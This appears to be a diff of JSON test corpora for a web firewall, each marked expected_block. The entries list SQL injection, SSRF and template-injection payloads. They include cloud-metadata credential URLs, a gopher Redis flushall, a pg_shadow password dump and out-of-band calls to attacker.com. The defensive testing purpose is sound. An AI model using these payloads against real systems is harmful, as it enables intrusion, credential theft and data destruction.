{"id":"sqli-adv-067","payload":"' UNION SELECT NULL,UNHEX(HEX(GROUP_CONCAT(table_name SEPARATOR 0x2c))) FROM information_schema.tables--","category":"sqli","method":"GET","severity_hint":"critical","tags":["union","mysql","evasion"],"notes":"HEX/UNHEX encoding bypass","expected_block":true},
|
|
69
|
+
{"id":"sqli-adv-068","payload":"' /*!12345UNION*/ /*!12345SELECT*/ 1,2,3--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","mysql","version-comment"],"notes":"Low-version MySQL conditional","expected_block":true},
|
|
70
|
+
{"id":"sqli-adv-069","payload":"' AND 1=0 UNION SELECT CONCAT(0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database())--","category":"sqli","method":"GET","severity_hint":"critical","tags":["union","mysql","info-gather"],"notes":"Multi-info extraction in one shot","expected_block":true},
|
|
71
|
+
{"id":"sqli-adv-070","payload":"')) OR 1=1--","category":"sqli","method":"GET","severity_hint":"critical","tags":["classic","double-paren"],"notes":"Double parenthesis closure","expected_block":true},
|
|
72
|
+
{"id":"sqli-adv-071","payload":"'))) OR 1=1--","category":"sqli","method":"GET","severity_hint":"critical","tags":["classic","triple-paren"],"notes":"Triple parenthesis closure","expected_block":true},
|
|
73
|
+
{"id":"sqli-adv-072","payload":"' OR 1=1 LIMIT 1 OFFSET 1--","category":"sqli","method":"GET","severity_hint":"critical","tags":["classic","limit"],"notes":"OR with LIMIT OFFSET","expected_block":true},
|
|
74
|
+
{"id":"sqli-adv-073","payload":"1' AND '1'='1","category":"sqli","method":"GET","severity_hint":"high","tags":["blind","boolean","no-comment"],"notes":"No trailing comment needed","expected_block":true},
|
|
75
|
+
{"id":"sqli-adv-074","payload":"1' AND (SELECT COUNT(*) FROM information_schema.tables)>0 AND '1'='1","category":"sqli","method":"GET","severity_hint":"high","tags":["blind","enumeration","no-comment"],"notes":"Info schema probe without comment","expected_block":true},
|
|
76
|
+
{"id":"sqli-adv-075","payload":"' UNION SELECT NULL FROM dual--","category":"sqli","method":"GET","severity_hint":"critical","tags":["union","oracle"],"notes":"Oracle UNION with dual","expected_block":true},
|
|
77
|
+
{"id":"sqli-adv-076","payload":"' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT user FROM dual))--","category":"sqli","method":"GET","severity_hint":"critical","tags":["error-based","oracle"],"notes":"Oracle CTXSYS error extraction","expected_block":true},
|
|
78
|
+
{"id":"sqli-adv-077","payload":"' AND 1=DBMS_UTILITY.SQLID_TO_SQLHASH((SELECT user FROM dual))--","category":"sqli","method":"GET","severity_hint":"critical","tags":["error-based","oracle"],"notes":"Oracle DBMS_UTILITY error","expected_block":true},
|
|
79
|
+
{"id":"sqli-adv-078","payload":"' AND XMLType((SELECT '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"http://attacker.com/'||(SELECT user FROM dual)||'\">%xxe;]>' FROM dual)) IS NOT NULL--","category":"sqli","method":"GET","severity_hint":"critical","tags":["oob","oracle","xxe"],"notes":"Oracle XXE-based OOB","expected_block":true},
|
|
80
|
+
{"id":"sqli-adv-079","payload":"' UNION SELECT NULL,sqlite_version()--","category":"sqli","method":"GET","severity_hint":"high","tags":["union","sqlite","fingerprint"],"notes":"SQLite version detection","expected_block":true},
|
|
81
|
+
{"id":"sqli-adv-080","payload":"' UNION SELECT NULL,sql FROM sqlite_master--","category":"sqli","method":"GET","severity_hint":"critical","tags":["union","sqlite","enumeration"],"notes":"SQLite schema dump","expected_block":true}
|
|
82
|
+
]
|
|
@@ -0,0 +1,62 @@
|
|
|
1
|
+
[
|
|
2
|
+
{"id":"sqli-ev-001","payload":"' aNd 1=1--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","case-variation"],"notes":"Random case AND","expected_block":true},
|
|
3
|
+
{"id":"sqli-ev-002","payload":"'%20OR%201%3D1--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","full-url-encode"],"notes":"Full URL encoded OR 1=1","expected_block":true},
|
|
4
|
+
{"id":"sqli-ev-003","payload":"' OR/**/'1'='1","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","inline-comment"],"notes":"Comment as whitespace","expected_block":true},
|
|
5
|
+
{"id":"sqli-ev-004","payload":"' %4fR 1=1--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","partial-encode"],"notes":"Partial encoding OR keyword","expected_block":true},
|
|
6
|
+
{"id":"sqli-ev-005","payload":"1'%0bOR%0b'1'='1","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","vtab"],"notes":"Vertical tab as separator","expected_block":true},
|
|
7
|
+
{"id":"sqli-ev-006","payload":"1'%0cOR%0c'1'='1","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","formfeed"],"notes":"Form feed as separator","expected_block":true},
|
|
8
|
+
{"id":"sqli-ev-007","payload":"1'%a0OR%a0'1'='1","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","nbsp"],"notes":"Non-breaking space separator","expected_block":true},
|
|
9
|
+
{"id":"sqli-ev-008","payload":"' OR+1=1--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","plus-space"],"notes":"Plus sign as space","expected_block":true},
|
|
10
|
+
{"id":"sqli-ev-009","payload":"'/**/UNION/**/ALL/**/SELECT/**/1,2,3--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","inline-comment","union"],"notes":"Comments between all keywords","expected_block":true},
|
|
11
|
+
{"id":"sqli-ev-010","payload":"'/**//*!UNION*//**//*!SELECT*//**/1,2,3--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","nested-comment","mysql"],"notes":"MySQL nested executable comment","expected_block":true},
|
|
12
|
+
{"id":"sqli-ev-011","payload":"' /*!00000UNION*/ /*!00000SELECT*/ 1,2,3--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","version-comment","mysql"],"notes":"Zero-version MySQL conditional","expected_block":true},
|
|
13
|
+
{"id":"sqli-ev-012","payload":"' UNION%23%0aSELECT 1,2,3--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","hash-newline","mysql"],"notes":"Hash comment then newline bypass","expected_block":true},
|
|
14
|
+
{"id":"sqli-ev-013","payload":"' UNION--%0aSELECT 1,2,3--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","dash-newline"],"notes":"Dash comment then newline","expected_block":true},
|
|
15
|
+
{"id":"sqli-ev-014","payload":"' UNI%4fN SE%4cECT 1,2,3--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","partial-encode"],"notes":"Partial hex encode keywords","expected_block":true},
|
|
16
|
+
{"id":"sqli-ev-015","payload":"' %55%4e%49%4f%4e %53%45%4c%45%43%54 1,2,3--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","full-hex-encode"],"notes":"Full hex encoded UNION SELECT","expected_block":true},
|
|
17
|
+
{"id":"sqli-ev-016","payload":"' UNION(SELECT(1),(2),(3))--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","no-space","parenthesis"],"notes":"Parenthesis instead of spaces","expected_block":true},
|
|
18
|
+
{"id":"sqli-ev-017","payload":"' OR 1.e0=1.e0--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","scientific-notation"],"notes":"Scientific notation comparison","expected_block":true},
|
|
19
|
+
{"id":"sqli-ev-018","payload":"' OR 0x31=0x31--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","hex-literal"],"notes":"Hex literal comparison","expected_block":true},
|
|
20
|
+
{"id":"sqli-ev-019","payload":"' OR 0b1=0b1--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","binary-literal"],"notes":"Binary literal comparison","expected_block":true},
|
|
21
|
+
{"id":"sqli-ev-020","payload":"' OR CHAR(49)=CHAR(49)--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","char-function"],"notes":"CHAR() function comparison","expected_block":true},
|
|
22
|
+
{"id":"sqli-ev-021","payload":"' OR 1<>2--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","alternative-operator"],"notes":"Not-equal operator bypass","expected_block":true},
|
|
23
|
+
{"id":"sqli-ev-022","payload":"' OR 1!=2--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","alternative-operator"],"notes":"Bang-equal operator","expected_block":true},
|
|
24
|
+
{"id":"sqli-ev-023","payload":"' UNION SELECT CHAR(117,115,101,114,110,97,109,101),2,3--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","char-function","union"],"notes":"CHAR() encoded column name","expected_block":true},
|
|
25
|
+
{"id":"sqli-ev-024","payload":"' AND 1=(SELECT 1 FROM/**/information_schema.tables)--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","inline-comment"],"notes":"Comment before table name","expected_block":true},
|
|
26
|
+
{"id":"sqli-ev-025","payload":"' UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","join-bypass"],"notes":"JOIN instead of comma separation","expected_block":true},
|
|
27
|
+
{"id":"sqli-ev-026","payload":"' UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES LIMIT 1)c)--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","join-bypass","enumeration"],"notes":"Nested JOIN for data extraction","expected_block":true},
|
|
28
|
+
{"id":"sqli-ev-027","payload":"1' AND 1=(SELECT CASE WHEN 1=1 THEN 1 ELSE (SELECT 1 UNION SELECT 2) END) AND '1'='1","category":"sqli","method":"GET","severity_hint":"high","tags":["evasion","case-when","no-comment"],"notes":"CASE WHEN boolean without comment","expected_block":true},
|
|
29
|
+
{"id":"sqli-ev-028","payload":"' UNION%0D%0ASELECT%0D%0A1,2,3--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","crlf"],"notes":"CRLF between keywords","expected_block":true},
|
|
30
|
+
{"id":"sqli-ev-029","payload":"'||UTL_HTTP.REQUEST('http://attacker.com/')--","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","oracle","oob"],"notes":"Oracle string concat OOB","expected_block":true},
|
|
31
|
+
{"id":"sqli-ev-030","payload":"' AND UPDATEXML(1,CONCAT(0x7e,(SELECT user()),0x7e),1)--","category":"sqli","method":"GET","severity_hint":"critical","tags":["error-based","mysql","evasion"],"notes":"MySQL UPDATEXML extraction","expected_block":true},
|
|
32
|
+
{"id":"sqli-ev-031","payload":"' AND EXP(~(SELECT * FROM (SELECT user())a))--","category":"sqli","method":"GET","severity_hint":"critical","tags":["error-based","mysql","evasion"],"notes":"MySQL EXP overflow extraction","expected_block":true},
|
|
33
|
+
{"id":"sqli-ev-032","payload":"' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7e,version(),0x7e))s), 8446744073709551610, 8446744073709551610)))--","category":"sqli","method":"GET","severity_hint":"critical","tags":["error-based","mysql","evasion"],"notes":"MySQL BIGINT overflow","expected_block":true},
|
|
34
|
+
{"id":"sqli-ev-033","payload":"' AND GEOMETRYCOLLECTION((SELECT * FROM (SELECT * FROM (SELECT@@version)f)g))--","category":"sqli","method":"GET","severity_hint":"critical","tags":["error-based","mysql","evasion"],"notes":"MySQL geometry function error","expected_block":true},
|
|
35
|
+
{"id":"sqli-ev-034","payload":"' AND POLYGON((SELECT * FROM (SELECT * FROM (SELECT@@version)f)g))--","category":"sqli","method":"GET","severity_hint":"critical","tags":["error-based","mysql","evasion"],"notes":"MySQL POLYGON error extraction","expected_block":true},
|
|
36
|
+
{"id":"sqli-ev-035","payload":"' AND LINESTRING((SELECT * FROM (SELECT * FROM (SELECT@@version)f)g))--","category":"sqli","method":"GET","severity_hint":"critical","tags":["error-based","mysql","evasion"],"notes":"MySQL LINESTRING error","expected_block":true},
|
|
37
|
+
{"id":"sqli-ev-036","payload":"' AND MULTIPOINT((SELECT * FROM (SELECT * FROM (SELECT@@version)f)g))--","category":"sqli","method":"GET","severity_hint":"critical","tags":["error-based","mysql","evasion"],"notes":"MySQL MULTIPOINT error","expected_block":true},
|
|
38
|
+
{"id":"sqli-ev-037","payload":"' AND MULTILINESTRING((SELECT * FROM (SELECT * FROM (SELECT@@version)f)g))--","category":"sqli","method":"GET","severity_hint":"critical","tags":["error-based","mysql","evasion"],"notes":"MySQL MULTILINESTRING error","expected_block":true},
|
|
39
|
+
{"id":"sqli-ev-038","payload":"' AND MULTIPOLYGON((SELECT * FROM (SELECT * FROM (SELECT@@version)f)g))--","category":"sqli","method":"GET","severity_hint":"critical","tags":["error-based","mysql","evasion"],"notes":"MySQL MULTIPOLYGON error","expected_block":true},
|
|
40
|
+
{"id":"sqli-ev-039","payload":"' PROCEDURE ANALYSE()--","category":"sqli","method":"GET","severity_hint":"high","tags":["enumeration","mysql"],"notes":"MySQL PROCEDURE ANALYSE enum","expected_block":true},
|
|
41
|
+
{"id":"sqli-ev-040","payload":"' UNION SELECT NULL,@@global.version_comment--","category":"sqli","method":"GET","severity_hint":"high","tags":["union","mysql","fingerprint"],"notes":"MySQL version comment variable","expected_block":true},
|
|
42
|
+
{"id":"sqli-ev-041","payload":"' UNION SELECT NULL,@@innodb_version--","category":"sqli","method":"GET","severity_hint":"high","tags":["union","mysql","fingerprint"],"notes":"MySQL InnoDB version","expected_block":true},
|
|
43
|
+
{"id":"sqli-ev-042","payload":"' OR 1=1#","category":"sqli","method":"GET","severity_hint":"critical","tags":["classic","mysql","hash-comment"],"notes":"MySQL hash comment termination","expected_block":true},
|
|
44
|
+
{"id":"sqli-ev-043","payload":"admin'--","category":"sqli","method":"POST","severity_hint":"critical","tags":["auth-bypass"],"notes":"Login bypass admin user","expected_block":true},
|
|
45
|
+
{"id":"sqli-ev-044","payload":"' OR ''='","category":"sqli","method":"GET","severity_hint":"critical","tags":["classic","empty-string"],"notes":"Empty string comparison bypass","expected_block":true},
|
|
46
|
+
{"id":"sqli-ev-045","payload":"') OR ('x')=('x","category":"sqli","method":"GET","severity_hint":"critical","tags":["classic","paren-variant"],"notes":"Parenthesized OR variant","expected_block":true},
|
|
47
|
+
{"id":"sqli-ev-046","payload":"'||(SELECT 1 WHERE 1=1)||'","category":"sqli","method":"GET","severity_hint":"critical","tags":["evasion","concat-operator"],"notes":"Concatenation operator bypass","expected_block":true},
|
|
48
|
+
{"id":"sqli-ev-047","payload":"' AND SUBSTR(version(),1,1)=5 AND '","category":"sqli","method":"GET","severity_hint":"high","tags":["blind","fingerprint","no-comment"],"notes":"PostgreSQL-style no trailing comment","expected_block":true},
|
|
49
|
+
{"id":"sqli-ev-048","payload":"'+convert(int,@@version)+'","category":"sqli","method":"GET","severity_hint":"critical","tags":["error-based","mssql","evasion"],"notes":"MSSQL convert concat","expected_block":true},
|
|
50
|
+
{"id":"sqli-ev-049","payload":"'+(SELECT TOP 1 CAST(name AS varchar(256)) FROM sysobjects WHERE xtype='U'FOR XML PATH(''))+'","category":"sqli","method":"GET","severity_hint":"critical","tags":["union","mssql","xml"],"notes":"MSSQL FOR XML PATH extraction","expected_block":true},
|
|
51
|
+
{"id":"sqli-ev-050","payload":"';WAITFOR DELAY '0:0:5'--","category":"sqli","method":"GET","severity_hint":"high","tags":["blind","time-based","mssql"],"notes":"MSSQL WAITFOR time-based","expected_block":true},
|
|
52
|
+
{"id":"sqli-ev-051","payload":"';IF (1=1) WAITFOR DELAY '0:0:5'--","category":"sqli","method":"GET","severity_hint":"high","tags":["blind","time-based","mssql"],"notes":"MSSQL conditional WAITFOR","expected_block":true},
|
|
53
|
+
{"id":"sqli-ev-052","payload":"' AND (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3)>0--","category":"sqli","method":"GET","severity_hint":"high","tags":["blind","time-based","mssql"],"notes":"MSSQL heavy query delay","expected_block":true},
|
|
54
|
+
{"id":"sqli-ev-053","payload":"' UNION ALL SELECT NULL,NULL,NULL--","category":"sqli","method":"GET","severity_hint":"critical","tags":["union","column-enum"],"notes":"UNION ALL with NULLs","expected_block":true},
|
|
55
|
+
{"id":"sqli-ev-054","payload":"' AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert(1)</script>',table_name FROM information_schema.tables WHERE 2>1--","category":"sqli","method":"GET","severity_hint":"critical","tags":["union","enumeration","xss"],"notes":"UNION with XSS in column","expected_block":true},
|
|
56
|
+
{"id":"sqli-ev-055","payload":"' UNION SELECT banner FROM v WHERE ROWNUM=1--","category":"sqli","method":"GET","severity_hint":"critical","tags":["union","oracle","fingerprint"],"notes":"Oracle banner extraction","expected_block":true},
|
|
57
|
+
{"id":"sqli-ev-056","payload":"' UNION SELECT NULL,usename||':'||passwd FROM pg_shadow--","category":"sqli","method":"GET","severity_hint":"critical","tags":["union","postgresql","credential-theft"],"notes":"PostgreSQL credential dump","expected_block":true},
|
|
58
|
+
{"id":"sqli-ev-057","payload":"' AND (SELECT unicode(substr(username,1,1)) FROM users LIMIT 1)>64--","category":"sqli","method":"GET","severity_hint":"high","tags":["blind","sqlite","binary-search"],"notes":"SQLite unicode extraction","expected_block":true},
|
|
59
|
+
{"id":"sqli-ev-058","payload":"' AND randomblob(100000000)--","category":"sqli","method":"GET","severity_hint":"high","tags":["blind","time-based","sqlite"],"notes":"SQLite heavy computation delay","expected_block":true},
|
|
60
|
+
{"id":"sqli-ev-059","payload":"' UNION SELECT NULL,LOAD_EXTENSION('\\\\attacker.com\\s.dll')--","category":"sqli","method":"GET","severity_hint":"critical","tags":["rce","sqlite"],"notes":"SQLite LOAD_EXTENSION RCE","expected_block":true},
|
|
61
|
+
{"id":"sqli-ev-060","payload":"true) OR (1=1","category":"sqli","method":"POST","severity_hint":"critical","tags":["evasion","json-context"],"notes":"JSON/API context injection","expected_block":true}
|
|
62
|
+
]
|
|
@@ -0,0 +1,52 @@
|
|
|
1
|
+
[
|
|
2
|
+
{"id":"ssrf-adv-001","payload":"http://127.0.0.1:80","category":"ssrf","method":"GET","severity_hint":"critical","tags":["basic","loopback"],"notes":"Basic loopback","expected_block":true},
|
|
3
|
+
{"id":"ssrf-adv-002","payload":"http://127.0.0.1:443","category":"ssrf","method":"GET","severity_hint":"critical","tags":["basic","loopback","https-port"],"notes":"Loopback HTTPS port","expected_block":true},
|
|
4
|
+
{"id":"ssrf-adv-003","payload":"http://127.0.0.1:8080","category":"ssrf","method":"GET","severity_hint":"critical","tags":["basic","loopback","alt-port"],"notes":"Loopback alt port","expected_block":true},
|
|
5
|
+
{"id":"ssrf-adv-004","payload":"http://127.0.0.1:8443","category":"ssrf","method":"GET","severity_hint":"critical","tags":["basic","loopback","alt-port"],"notes":"Loopback HTTPS alt port","expected_block":true},
|
|
6
|
+
{"id":"ssrf-adv-005","payload":"http://0.0.0.0","category":"ssrf","method":"GET","severity_hint":"critical","tags":["zero-ip"],"notes":"0.0.0.0 all interfaces","expected_block":true},
|
|
7
|
+
{"id":"ssrf-adv-006","payload":"http://0","category":"ssrf","method":"GET","severity_hint":"critical","tags":["zero-ip","shorthand"],"notes":"Shorthand zero IP","expected_block":true},
|
|
8
|
+
{"id":"ssrf-adv-007","payload":"http://0x7f000001","category":"ssrf","method":"GET","severity_hint":"critical","tags":["hex-ip","evasion"],"notes":"Hex encoded 127.0.0.1","expected_block":true},
|
|
9
|
+
{"id":"ssrf-adv-008","payload":"http://2130706433","category":"ssrf","method":"GET","severity_hint":"critical","tags":["decimal-ip","evasion"],"notes":"Decimal encoded 127.0.0.1","expected_block":true},
|
|
10
|
+
{"id":"ssrf-adv-009","payload":"http://0177.0.0.1","category":"ssrf","method":"GET","severity_hint":"critical","tags":["octal-ip","evasion"],"notes":"Octal encoded 127.0.0.1","expected_block":true},
|
|
11
|
+
{"id":"ssrf-adv-010","payload":"http://0x7f.0x0.0x0.0x1","category":"ssrf","method":"GET","severity_hint":"critical","tags":["hex-dotted","evasion"],"notes":"Hex dotted notation","expected_block":true},
|
|
12
|
+
{"id":"ssrf-adv-011","payload":"http://127.1","category":"ssrf","method":"GET","severity_hint":"critical","tags":["shorthand","loopback"],"notes":"Abbreviated 127.0.0.1","expected_block":true},
|
|
13
|
+
{"id":"ssrf-adv-012","payload":"http://127.0.1","category":"ssrf","method":"GET","severity_hint":"critical","tags":["shorthand","loopback"],"notes":"Three-octet abbreviated","expected_block":true},
|
|
14
|
+
{"id":"ssrf-adv-013","payload":"http://[::1]","category":"ssrf","method":"GET","severity_hint":"critical","tags":["ipv6","loopback"],"notes":"IPv6 loopback","expected_block":true},
|
|
15
|
+
{"id":"ssrf-adv-014","payload":"http://[::ffff:127.0.0.1]","category":"ssrf","method":"GET","severity_hint":"critical","tags":["ipv6","mapped","evasion"],"notes":"IPv6-mapped IPv4 loopback","expected_block":true},
|
|
16
|
+
{"id":"ssrf-adv-015","payload":"http://[0:0:0:0:0:ffff:127.0.0.1]","category":"ssrf","method":"GET","severity_hint":"critical","tags":["ipv6","expanded","evasion"],"notes":"Expanded IPv6-mapped","expected_block":true},
|
|
17
|
+
{"id":"ssrf-adv-016","payload":"http://[::]","category":"ssrf","method":"GET","severity_hint":"critical","tags":["ipv6","any"],"notes":"IPv6 any address","expected_block":true},
|
|
18
|
+
{"id":"ssrf-adv-017","payload":"http://169.254.169.254/latest/meta-data/","category":"ssrf","method":"GET","severity_hint":"critical","tags":["cloud","aws","metadata"],"notes":"AWS metadata service","expected_block":true},
|
|
19
|
+
{"id":"ssrf-adv-018","payload":"http://169.254.169.254/latest/meta-data/iam/security-credentials/","category":"ssrf","method":"GET","severity_hint":"critical","tags":["cloud","aws","iam","credentials"],"notes":"AWS IAM credentials","expected_block":true},
|
|
20
|
+
{"id":"ssrf-adv-019","payload":"http://169.254.169.254/latest/user-data/","category":"ssrf","method":"GET","severity_hint":"critical","tags":["cloud","aws","userdata"],"notes":"AWS user data (may contain secrets)","expected_block":true},
|
|
21
|
+
{"id":"ssrf-adv-020","payload":"http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance","category":"ssrf","method":"GET","severity_hint":"critical","tags":["cloud","aws","imdsv2"],"notes":"AWS IMDS identity credentials","expected_block":true},
|
|
22
|
+
{"id":"ssrf-adv-021","payload":"http://metadata.google.internal/computeMetadata/v1/","category":"ssrf","method":"GET","severity_hint":"critical","tags":["cloud","gcp","metadata"],"notes":"GCP metadata endpoint","expected_block":true},
|
|
23
|
+
{"id":"ssrf-adv-022","payload":"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token","category":"ssrf","method":"GET","severity_hint":"critical","tags":["cloud","gcp","token"],"notes":"GCP service account token","expected_block":true},
|
|
24
|
+
{"id":"ssrf-adv-023","payload":"http://metadata.google.internal/computeMetadata/v1/project/project-id","category":"ssrf","method":"GET","severity_hint":"high","tags":["cloud","gcp","project"],"notes":"GCP project ID","expected_block":true},
|
|
25
|
+
{"id":"ssrf-adv-024","payload":"http://169.254.169.254/metadata/instance?api-version=2021-02-01","category":"ssrf","method":"GET","severity_hint":"critical","tags":["cloud","azure","metadata"],"notes":"Azure IMDS endpoint","expected_block":true},
|
|
26
|
+
{"id":"ssrf-adv-025","payload":"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/","category":"ssrf","method":"GET","severity_hint":"critical","tags":["cloud","azure","token"],"notes":"Azure managed identity token","expected_block":true},
|
|
27
|
+
{"id":"ssrf-adv-026","payload":"http://100.100.100.200/latest/meta-data/","category":"ssrf","method":"GET","severity_hint":"critical","tags":["cloud","alibaba","metadata"],"notes":"Alibaba Cloud metadata","expected_block":true},
|
|
28
|
+
{"id":"ssrf-adv-027","payload":"http://169.254.169.254/openstack/latest/meta_data.json","category":"ssrf","method":"GET","severity_hint":"critical","tags":["cloud","openstack","metadata"],"notes":"OpenStack metadata","expected_block":true},
|
|
29
|
+
{"id":"ssrf-adv-028","payload":"http://169.254.169.254/metadata/v1.json","category":"ssrf","method":"GET","severity_hint":"critical","tags":["cloud","digitalocean","metadata"],"notes":"DigitalOcean metadata","expected_block":true},
|
|
30
|
+
{"id":"ssrf-adv-029","payload":"http://169.254.169.254/v1/","category":"ssrf","method":"GET","severity_hint":"critical","tags":["cloud","oracle","metadata"],"notes":"Oracle Cloud metadata","expected_block":true},
|
|
31
|
+
{"id":"ssrf-adv-030","payload":"http://127.0.0.1:2375/containers/json","category":"ssrf","method":"GET","severity_hint":"critical","tags":["docker","api"],"notes":"Docker API container list","expected_block":true},
|
|
32
|
+
{"id":"ssrf-adv-031","payload":"http://127.0.0.1:2375/images/json","category":"ssrf","method":"GET","severity_hint":"critical","tags":["docker","api"],"notes":"Docker API image list","expected_block":true},
|
|
33
|
+
{"id":"ssrf-adv-032","payload":"http://127.0.0.1:10250/pods","category":"ssrf","method":"GET","severity_hint":"critical","tags":["kubernetes","kubelet"],"notes":"Kubelet API pod list","expected_block":true},
|
|
34
|
+
{"id":"ssrf-adv-033","payload":"http://127.0.0.1:10255/pods","category":"ssrf","method":"GET","severity_hint":"critical","tags":["kubernetes","kubelet","readonly"],"notes":"Kubelet read-only pod list","expected_block":true},
|
|
35
|
+
{"id":"ssrf-adv-034","payload":"http://127.0.0.1:6443/api/v1/namespaces","category":"ssrf","method":"GET","severity_hint":"critical","tags":["kubernetes","api-server"],"notes":"K8s API server namespaces","expected_block":true},
|
|
36
|
+
{"id":"ssrf-adv-035","payload":"http://127.0.0.1:2379/v2/keys/?recursive=true","category":"ssrf","method":"GET","severity_hint":"critical","tags":["etcd","secrets"],"notes":"etcd key dump","expected_block":true},
|
|
37
|
+
{"id":"ssrf-adv-036","payload":"http://127.0.0.1:8500/v1/agent/self","category":"ssrf","method":"GET","severity_hint":"critical","tags":["consul","service-mesh"],"notes":"Consul agent info","expected_block":true},
|
|
38
|
+
{"id":"ssrf-adv-037","payload":"http://127.0.0.1:8200/v1/sys/health","category":"ssrf","method":"GET","severity_hint":"critical","tags":["vault","secrets"],"notes":"HashiCorp Vault health","expected_block":true},
|
|
39
|
+
{"id":"ssrf-adv-038","payload":"http://127.0.0.1:9200/_cat/indices","category":"ssrf","method":"GET","severity_hint":"critical","tags":["elasticsearch","data"],"notes":"Elasticsearch indices","expected_block":true},
|
|
40
|
+
{"id":"ssrf-adv-039","payload":"http://127.0.0.1:6379/","category":"ssrf","method":"GET","severity_hint":"critical","tags":["redis","cache"],"notes":"Redis service probe","expected_block":true},
|
|
41
|
+
{"id":"ssrf-adv-040","payload":"gopher://127.0.0.1:6379/_*1%0d%0a%0d%0aflushall%0d%0a","category":"ssrf","method":"GET","severity_hint":"critical","tags":["gopher","redis","rce"],"notes":"Gopher Redis interaction","expected_block":true},
|
|
42
|
+
{"id":"ssrf-adv-041","payload":"gopher://127.0.0.1:25/_HELO%20attacker%0d%0aMAIL%20FROM:<attacker@test.com>%0d%0a","category":"ssrf","method":"GET","severity_hint":"critical","tags":["gopher","smtp"],"notes":"Gopher SMTP interaction","expected_block":true},
|
|
43
|
+
{"id":"ssrf-adv-042","payload":"dict://127.0.0.1:6379/info","category":"ssrf","method":"GET","severity_hint":"critical","tags":["dict","redis","protocol"],"notes":"DICT protocol Redis info","expected_block":true},
|
|
44
|
+
{"id":"ssrf-adv-043","payload":"file:///etc/passwd","category":"ssrf","method":"GET","severity_hint":"critical","tags":["file-uri","protocol"],"notes":"file:// protocol handler","expected_block":true},
|
|
45
|
+
{"id":"ssrf-adv-044","payload":"http://attacker.com@127.0.0.1/","category":"ssrf","method":"GET","severity_hint":"critical","tags":["url-confusion","credentials"],"notes":"URL authority confusion","expected_block":true},
|
|
46
|
+
{"id":"ssrf-adv-045","payload":"http://127.0.0.1#@attacker.com/","category":"ssrf","method":"GET","severity_hint":"critical","tags":["url-confusion","fragment"],"notes":"Fragment-based confusion","expected_block":true},
|
|
47
|
+
{"id":"ssrf-adv-046","payload":"http://127.0.0.1%23@attacker.com/","category":"ssrf","method":"GET","severity_hint":"critical","tags":["url-confusion","encoded"],"notes":"Encoded fragment confusion","expected_block":true},
|
|
48
|
+
{"id":"ssrf-adv-047","payload":"http://127。0。0。1","category":"ssrf","method":"GET","severity_hint":"critical","tags":["unicode","ideographic-dot"],"notes":"Ideographic full stop bypass","expected_block":true},
|
|
49
|
+
{"id":"ssrf-adv-048","payload":"http://①②⑦.⓪.⓪.①","category":"ssrf","method":"GET","severity_hint":"critical","tags":["unicode","circled-numbers"],"notes":"Unicode circled numbers","expected_block":true},
|
|
50
|
+
{"id":"ssrf-adv-049","payload":"http://127.0.0.1.nip.io","category":"ssrf","method":"GET","severity_hint":"critical","tags":["dns-rebind","wildcard"],"notes":"Wildcard DNS service","expected_block":true},
|
|
51
|
+
{"id":"ssrf-adv-050","payload":"http://localtest.me","category":"ssrf","method":"GET","severity_hint":"critical","tags":["dns-rebind","localhost"],"notes":"DNS resolving to 127.0.0.1","expected_block":true}
|
|
52
|
+
]
|
|
@@ -0,0 +1,42 @@
|
|
|
1
|
+
[
|
|
2
|
+
{"id":"ssti-adv-001","payload":"{{7*7}}","category":"ssti","method":"GET","severity_hint":"critical","tags":["jinja2","twig","generic"],"notes":"Universal SSTI probe","expected_block":true},
|
|
3
|
+
{"id":"ssti-adv-002","payload":"${7*7}","category":"ssti","method":"GET","severity_hint":"critical","tags":["freemarker","velocity","generic"],"notes":"Dollar-brace SSTI probe","expected_block":true},
|
|
4
|
+
{"id":"ssti-adv-003","payload":"<%= 7*7 %>","category":"ssti","method":"GET","severity_hint":"critical","tags":["erb","jsp","generic"],"notes":"ERB/JSP SSTI probe","expected_block":true},
|
|
5
|
+
{"id":"ssti-adv-004","payload":"#{7*7}","category":"ssti","method":"GET","severity_hint":"critical","tags":["ruby","generic"],"notes":"Ruby interpolation probe","expected_block":true},
|
|
6
|
+
